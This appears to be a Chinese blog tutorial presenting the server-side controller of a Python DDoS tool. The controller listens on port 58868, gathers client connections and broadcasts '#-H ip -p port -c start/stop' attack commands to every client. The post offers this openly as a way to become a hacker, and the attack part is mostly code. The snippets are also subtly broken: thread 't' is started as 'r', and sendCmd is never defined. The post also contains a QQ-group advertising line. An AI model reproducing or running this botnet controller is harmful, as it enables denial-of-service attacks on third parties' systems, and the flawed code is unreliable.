Python实现DDOS攻击,下个黑客就是你!
DDOS攻击的一些基础知识点在这里就不再赘述,由于Server端要控制client,所以这里需要使用argparse,在这里我们先规定好命令格式:#-H XXX.XXX.XXX.XXX -p xxxx -c<start|stop>
-H后面接的是被攻击主机的IP地址。
-p指定被攻击的端口号。
-c控制攻击的开始与结束。
编码实现:
Server端发送命令,绑定所有网络地址和58868端口并开始监听,之后我们新开一个线程来等待客户端的连接,以免阻塞我们输入命令。
1 def main(): 2 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 3 s.bind(('0.0.0.0',58868)) 4 s.listen(2014) 5 t = Thread(target = waitConnect,args=(s,)) 6 r.start()
由于我们要给所有的客户端发送命令,所以我们在新开的线程中将连接进来的socket添加到一个list当中。在主函数中我们第一次输入命令之前需要至少有一个客户端连接到服务器,所以这里我们判断了一下socket的长度。Python群 125240963 进群获取数十套PDF电子书和各种视频!
1 print('Wait at lease a client connection!') 2 while not len(socketList): 3 pass 4 print('It has been a client connection!')
现在循环等待输入命令,输入之后判断命令是否满足命令格式的基本要求,如果满足了,我们就把命令发送给所有客户端。
1 while True: 2 print('=' * 50) 3 print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c <start>"') 4 #等待输入命令 5 cmd_str = input('Please input cmd:') 6 if len(cmd_str): 7 if cmd_str[0] == '#': 8 sendCmd(cmd_str)
现在我们程序的大体框架已经有了,现在我们来编写主函数中没有完成的子功能。 首先我们应该实现等待客户端的函数,方便开启新的线程。
在这个函数中,我们只需要循环等待客户端的连接就可以了,新连接的socket要判断一下是否在socketList中已经存储过了,如果没有的话就添加到socketList中。
1 #等待连接 2 def waitConnect(s): 3 while True: 4 sock,addr = s.accept() 5 if sock not in socketList: 6 socketList.append(sock)
我们再来实现发送命令的函数,这个函数我们遍历socketList这个列表,将每个socket都调用一次send将命令发送出去。
至此我们的Server端就完成了。
上一篇: 使用httprunner框架实现自动化测试—基础篇
下一篇: ES6 语法学习总结